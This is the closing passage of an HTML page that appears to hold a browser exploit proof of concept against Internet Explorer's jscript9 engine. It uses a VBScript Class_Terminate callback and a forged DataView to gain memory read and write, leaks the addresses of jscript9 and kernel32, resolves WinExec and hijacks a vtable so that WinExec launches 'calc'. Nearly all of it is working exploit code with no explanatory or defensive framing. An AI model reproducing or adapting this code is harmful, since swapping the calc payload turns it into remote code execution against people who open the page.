1,p2289:1,p2290:1,p2291:1,p2292:1,p2293:1,p2294:1,p2295:1,p2296:1,p2297:1,p2298:1,p2299:1,p2300:1,p2301:1,p2302:1,p2303:1,p2304:1,p2305:1,p2306:1,p2307:1,p2308:1,p2309:1,p2310:1,p2311:1,p2312:1,p2313:1,p2314:1,p2315:1,p2316:1,p2317:1,p2318:1,p2319:1,p2320:1,p2321:1,p2322:1,p2323:1,p2324:1,p2325:1,p2326:1,p2327:1,p2328:1,p2329:1,p2330:1,p2331:1,p2332:1,p2333:1,p2334:1,p2335:1,p2336:1,p2337:1,p2338:1,p2339:1,p2340:1,p2341:1,p2342:1,p2343:1,p2344:1,p2345:1,p2346:1,p2347:1,p2348:1,p2349:1,p2350:1,p2351:1,p2352:1,p2353:1,p2354:1,p2355:1,p2356:1,p2357:1,p2358:1,p2359:1,p2360:1,p2361:1,p2362:1,p2363:1,p2364:1,p2365:1,p2366:1,p2367:1,p2368:1,p2369:1,p2370:1,p2371:1,p2372:1,p2373:1,p2374:1,p2375:1,p2376:1,p2377:1,p2378:1,p2379:1,p2380:1,p2381:1,p2382:1,p2383:1,p2384:1,p2385:1,p2386:1,p2387:1,p2388:1,p2389:1,p2390:1,p2391:1,p2392:1,p2393:1,p2394:1,p2395:1,p2396:1,p2397:1,p2398:1,p2399:1,p2400:1,p2401:1,p2402:1,p2403:1,p2404:1,p2405:1,p2406:1,p2407:1,p2408:1,p2409:1,p2410:1,p2411:1,p2412:1,p2413:1,p2414:1,p2415:1,p2416:1,p2417:1,p2418:1,p2419:1,p2420:1,p2421:1,p2422:1,p2423:1,p2424:1,p2425:1,p2426:1,p2427:1,p2428:1,p2429:1,p2430:1,p2431:1,p2432:1,p2433:1,p2434:1,p2435:1,p2436:1,p2437:1,p2438:1,p2439:1,p2440:1,p2441:1,p2442:1,p2443:1,p2444:1,p2445:1,p2446:1,p2447:1,p2448:1,p2449:1,p2450:1,p2451:1,p2452:1,p2453:1,p2454:1,p2455:1,p2456:1,p2457:1,p2458:1,p2459:1,p2460:1,p2461:1,p2462:1,p2463:1,p2464:1,p2465:1,p2466:1,p2467:1,p2468:1,p2469:1,p2470:1,p2471:1,p2472:1,p2473:1,p2474:1,p2475:1,p2476:1,p2477:1,p2478:1,p2479:1,p2480:1,p2481:1,p2482:1,p2483:1,p2484:1,p2485:1,p2486:1,p2487:1,p2488:1,p2489:1,p2490:1,p2491:1,p2492:1,p2493:1,p2494:1,p2495:1,p2496:1,p2497:1,p2498:1,p2499:1,p2500:1,p2501:1,p2502:1,p2503:1,p2504:1,p2505:1,p2506:1,p2507:1,p2508:1,p2509:1,p2510:1,p2511:1,p2512:1,p2513:1,p2514:1,p2515:1,p2516:1,p2517:1,p2518:1,p2519:1,p2520:1,p2521:1,p2522:1,p2523:1,p2524:1,p2525:1,p2526:1,p2527:1,p2528:1,p2529:1,p2530:1,p2531:1,p2532:1,p2533:1,p2534:1,p2535:1,p2536:1,p2537:1,p2538:1,p2539:1,p2540:1,p2541:1,p2542:1,p2543:1,p2544:1,p2545:1,p2546:1,p2547:1,p2548:1,p2549:1,p2550:1,p2551:1,p2552:1,p2553:1,p2554:1,p2555:1,p2556:1,p2557:1,p2558:1,p2559:1,p2560:1,p2561:1,p2562:1,p2563:1,p2564:1,p2565:1,p2566:1,p2567:1,p2568:1,p2569:1,p2570:1,p2571:1,p2572:1,p2573:1,p2574:1,p2575:1,p2576:1,p2577:1,p2578:1,p2579:1,p2580:1,p2581:1,p2582:1,p2583:1,p2584:1,p2585:1,p2586:1,p2587:1,p2588:1,p2589:1,p2590:1,p2591:1,p2592:1,p2593:1,p2594:1,p2595:1,p2596:1,p2597:1,p2598:1,p2599:1,p2600:1,p2601:1,p2602:1,p2603:1,p2604:1,p2605:1,p2606:1,p2607:1,p2608:1,p2609:1,p2610:1,p2611:1,p2612:1,p2613:1,p2614:1,p2615:1,p2616:1,p2617:1,p2618:1,p2619:1,p2620:1,p2621:1,p2622:1,p2623:1,p2624:1,p2625:1,p2626:1,p2627:1,p2628:1,p2629:1,p2630:1,p2631:1,p2632:1,p2633:1,p2634:1,p2635:1,p2636:1,p2637:1,p2638:1,p2639:1,p2640:1,p2641:1,p2642:1,p2643:1,p2644:1,p2645:1,p2646:1,p2647:1,p2648:1,p2649:1,p2650:1,p2651:1,p2652:1,p2653:1,p2654:1,p2655:1,p2656:1,p2657:1,p2658:1,p2659:1,p2660:1,p2661:1,p2662:1,p2663:1,p2664:1,p2665:1,p2666:1,p2667:1,p2668:1,p2669:1,p2670:1,p2671:1,p2672:1,p2673:1,p2674:1,p2675:1,p2676:1,p2677:1,p2678:1,p2679:1,p2680:1,p2681:1,p2682:1,p2683:1,p2684:1,p2685:1,p2686:1,p2687:1,p2688:1,p2689:1,p2690:1,p2691:1,p2692:1,p2693:1,p2694:1,p2695:1,p2696:1,p2697:1,p2698:1,p2699:1,p2700:1,p2701:1,p2702:1,p2703:1,p2704:1,p2705:1,p2706:1,p2707:1,p2708:1,p2709:1,p2710:1,p2711:1,p2712:1,p2713:1,p2714:1,p2715:1,p2716:1,p2717:1,p2718:1,p2719:1,p2720:1,p2721:1,p2722:1,p2723:1,p2724:1,p2725:1,p2726:1,p2727:1,p2728:1,p2729:1,p2730:1,p2731:1,p2732:1,p2733:1,p2734:1,p2735:1,p2736:1,p2737:1,p2738:1,p2739:1,p2740:1,p2741:1,p2742:1,p2743:1,p2744:1,p2745:1,p2746:1,p2747:1,p2748:1,p2749:1,p2750:1,p2751:1,p2752:1,p2753:1,p2754:1,p2755:1,p2756:1,p2757:1,p2758:1,p2759:1,p2760:1,p2761:1,p2762:1,p2763:1,p2764:1,p2765:1,p2766:1,p2767:1,p2768:1,p2769:1,p2770:1,p2771:1,p2772:1,p2773:1,p2774:1,p2775:1,p2776:1,p2777:1,p2778:1,p2779:1,p2780:1,p2781:1,p2782:1,p2783:1,p2784:1,p2785:1,p2786:1,p2787:1,p2788:1,p2789:1,p2790:1,p2791:1,p2792:1,p2793:1,p2794:1,p2795:1,p2796:1,p2797:1,p2798:1,p2799:1,p2800:1,p2801:1,p2802:1,p2803:1,p2804:1,p2805:1,p2806:1,p2807:1,p2808:1,p2809:1,p2810:1,p2811:1,p2812:1,p2813:1,p2814:1,p2815:1,p2816:1,p2817:1,p2818:1,p2819:1,p2820:1,p2821:1,p2822:1,p2823:1,p2824:1,p2825:1,p2826:1,p2827:1,p2828:1,p2829:1,p2830:1,p2831:1,p2832:1,p2833:1,p2834:1,p2835:1,p2836:1,p2837:1,p2838:1,p2839:1,p2840:1,p2841:1,p2842:1,p2843:1,p2844:1,p2845:1,p2846:1,p2847:1,p2848:1,p2849:1,p2850:1,p2851:1,p2852:1,p2853:1,p2854:1,p2855:1,p2856:1,p2857:1,p2858:1,p2859:1,p2860:1,p2861:1,p2862:1,p2863:1,p2864:1,p2865:1,p2866:1};
if (!stop)
return;
a2[1] = ga;
a2[2] = fo;
arr[0] = arr[1] + 0x38;
u32[0] = arr[1];
u32[1] = arr[2];
arr[1] = 1;
}
//for (var i = 0; i < 1000; i++)
// func([1.1], [], 1);
function main() {
ggg = a;
stop = false;
var i = 0;
for (; i < 0x100000 && !stop; ++ i) {
func(a, a);
}
ga_addr = u32[0];
fo_addr = u32[1];
dv_addr = ga_addr + 0x38;
ga[0] = 0x2e;
ga[1] = dv_addr;
ga[2] = dv_addr - 0x210;
ga[3] = 0;
ga[4] = ga_addr + 0x24;
ga[5] = 0;
ga[6] = -1;
ga[7] = dv_addr;
dv = a[0];
var rdv = new DataView(new ArrayBuffer(8));
var rtype = readPointer(leakObjectAddress(rdv) + 4);
// Fix fake DataView->type
ga[0x04 / 4] = rtype;
var space = new DataView(new ArrayBuffer(0x200));
var space_addr = readPointer(leakObjectAddress(space) + 0x1c);
var fake_vtable_addr = space_addr;
var cmd_addr = space_addr + 0x100;
var target_arr = new Array( 1, 2, 3, 4, 5 );
var target_arr_addr = leakObjectAddress(target_arr);
jscript9_base = getModuleBase(readPointer(target_arr_addr));
kernel32_base = getModuleBaseFromIAT(jscript9_base, 'KERNEL32');
var winexec = getProcAddress( kernel32_base, 'WinExec' );
write32( target_arr_addr, fake_vtable_addr );
write32( fake_vtable_addr + 0x7C, winexec );
writeString(cmd_addr, 'calc');
if ( cmd_addr in target_arr ) {}
alert("wtf?");
}
var arr = new Array();
var arr_arr = new Array();
function ff()
{
ggg[0] = {};
stop = true;
}
</script>
<script type="text/vbscript">
Dim o
Class cla0
Private Sub Class_Terminate
call ff
End Sub
End Class
Set o = new cla0
</script>
<script language='javascript'>
stop = true;
for (var i = 0; i < 10000; ++ i)
func(a, [{}, {}]);
arr.push(o);
o = null;
arr[0] = null;
setTimeout(main, 1);
</script>